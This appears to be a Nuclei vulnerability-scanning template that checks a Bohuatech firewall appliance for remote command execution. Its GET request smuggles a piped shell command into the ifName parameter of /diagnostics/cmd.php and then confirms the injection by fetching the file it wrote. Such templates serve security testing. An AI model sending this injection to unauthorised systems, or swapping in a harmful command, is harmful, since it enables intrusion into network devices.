id: bohuatech-rce

info:
  name: 博华网龙防火墙一体机rce
  author: Str1am
  severity: high
  tags: bohuatech,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/diagnostics/cmd.php?action=arping&ifName=1|echo%20202cb962ac59075b964b07152d234b70%20>%201.txt|"
      - "{{BaseURL}}/diagnostics/1.txt"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"
        part: body
        condition: and
